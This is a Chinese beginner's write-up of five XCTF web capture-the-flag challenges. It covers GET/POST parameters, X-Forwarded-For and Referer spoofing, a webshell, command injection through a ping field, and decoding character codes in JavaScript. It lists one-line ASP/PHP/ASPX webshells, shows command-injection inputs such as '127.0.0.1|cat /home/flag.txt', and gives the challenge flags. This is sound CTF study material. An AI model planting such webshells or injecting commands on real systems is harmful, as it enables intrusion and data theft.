當前位置:網站首頁>攻防世界題解三(xiao白筆記)

攻防世界題解三(xiao白筆記)

2022-01-27 18:59:19 quan9i

文章目錄


1、題解
2、知識擴充

第八關
get_post
在這裏插入圖片描述
打開網站
在這裏插入圖片描述
以get方式提交a=1,即在url後直接輸入,但你需要加上/?,如下圖所示
在這裏插入圖片描述
此時出現讓以post方式提交b=2,在這裏我推薦使用hackbar插件(火狐瀏覽器)
在這裏插入圖片描述
此時點擊execute
在這裏插入圖片描述
flag顯現,flag為cyberpeace{2e168760fe0fcc1736d929753bfd9cc1},解題完成!

知識擴充:get方式遞交會在url顯現,而post方式遞交後url則是看不 見的
最直觀的區別就是GET把參數包含在URL中,POST通過request body傳遞參數,詳細解釋見https://www.zhihu.com/question/28586791。

第九關
xff_referer
題目
在這裏插入圖片描述
打開網站
在這裏插入圖片描述
網站中提出了ip地址,觀察題目,題目中說xff可以偽造,那我們利用burpsuite來偽造一個ip地址,具體操作如下
<1>點擊 send to Repeater
在這裏插入圖片描述
點擊上方的Repeat
在這裏插入圖片描述輸入ip地址
在這裏插入圖片描述
點擊Go實行
在這裏插入圖片描述
右邊是反應,此時右邊說必須來自穀歌瀏覽器,那我們再加上一句話即可,如下圖所示
在這裏插入圖片描述
按Go查看反應
在這裏插入圖片描述
flag顯現,flag為cyberpeace{fc8f2b4b4810dbeff9524b53c07f26d7}
解題完成

知識擴充:
1、xff,即X-Forwarded-For,是一個 HTTP 擴展頭部,主要是為了讓 Web 服務器獲取訪問用戶的真實 IP 地址。在代理轉發及反向代理中經常使用X-Forwarded-For 字段,簡單的說,就是xff告訴服務器當前請求者最終ip的http請求頭部字段
2、Referer
HTTP Referer是header的一部分,當瀏覽器向web服務器發送請求的時候,一般會帶上Referer,告訴服務器該網頁是從哪個頁面鏈接過來的,服務器因此可以獲得一些信息用於處理。

第十關
webshell
題目
在這裏插入圖片描述
打開網站
在這裏插入圖片描述

發現這是一句話木馬,給出的value為shell,首先查看這個包含的文件有哪些,我用hackbar(火狐瀏覽器)來查找
在這裏插入圖片描述
按execute,查看結果
在這裏插入圖片描述
發現文件為flag.txt和index.php,我們需要查看flag.txt的內容,操作如下圖所示
在這裏插入圖片描述
查看結果
在這裏插入圖片描述
flag顯現,flag為cyberpeace{a2e0201a45c33727a8589139174a7f90},解題完成!

也可以利用中國蟻劍或者中國菜刀來連接ip地址查看文件內容等,burpsuite也可以。
解題鏈接:https://www.cnblogs.com/darklee/p/12620069.html

知識擴充:
1、根據一句話木馬獲得站點的目錄
常見的一句話木馬
  asp一句話木馬:
   <%execute(request(“value”))%>
  php一句話木馬:
   <?php @eval($_POST[value]);?>
  aspx一句話木馬:
  <%@ Page Language=“Jscript”%>
  <%eval(Request.Item[“value”])%>

第十一關
command_execution
題目
在這裏插入圖片描述
打開網站
在這裏插入圖片描述
先ping本地試一下
在這裏插入圖片描述
發現可以ping通,那我們可以試著找一下flag,flag一般為txt格式,所以我們尋找所有txt文件,命令為127.0.0.1 |find / -name "*.txt"
在這裏插入圖片描述
發現flag.txt存在於home下,接下來查看flag.txt,命令為:127.0.0.1|cat /home/flag.txt
在這裏插入圖片描述
flag顯現,flag為cyberpeace{35283ab728b1cdfe576ad34b129318ac},解題完成!

知識擴充:
1、Web應用防護系統(也稱為:網站應用級入侵防禦系統。英文:Web Application Firewall,簡稱: WAF)。利用國際上公認的一種說法:Web應用防火牆是通過執行一系列針對HTTP/HTTPS的安全策略來專門為Web應用提供保護的一款產品。
2、ping (Packet Internet Groper)是一種因特網包探索器,用於測試網絡連接量的程序 [1] 。Ping是工作在 TCP/IP網絡體系結構中應用層的一個服務命令, 主要是向特定的目的主機發送 ICMP(Internet Control Message Protocol 因特網報文控制協議)Echo 請求報文,測試目的站是否可達及了解其有關狀態 [2] 。

第十二關
simple_js
觀察題目
在這裏插入圖片描述

打開網站
在這裏插入圖片描述
隨便輸入數字,發現是如下情况
在這裏插入圖片描述
查看源碼
在這裏插入圖片描述
fromCharCode函數是指數字轉換成字符串,那其後面的一定是數值,
所以我們如果把後面的輸入,按理說應該輸出的是字符串,我們開始嘗試
在這裏插入圖片描述
在這裏插入圖片描述
最終發現,結果都是
在這裏插入圖片描述
說明此處存在著猫膩,不難發現,後面是十六進制數,我們利用轉換工具轉換為數值
在這裏插入圖片描述
得到的數字為55,56,54,79,115,69,114,116,107,49,50
我們再用ASCII碼錶將其一一進行轉換,ASCII碼錶鏈接https://www.qqxiuzi.cn/bianma/ascii.htm
最終得到的字符串為786OsErtk12
再觀察題幹,給出了flag的模板
在這裏插入圖片描述
據此可知,flag為Cyberpeace{786OsErtk12}

知識擴充
fromCharCode()函數
作用:此函數可將數字轉換成字符
在這裏插入圖片描述
菜鳥教程講解鏈接:鋒https://www.runoob.com/jsref/jsref-fromcharcode.html

在這裏插入圖片描述

xctf新手web題完成!

版權聲明
本文為[quan9i]所創,轉載請帶上原文鏈接,感謝
https://cht.chowdera.com/2022/01/202201271859186000.html

隨機推薦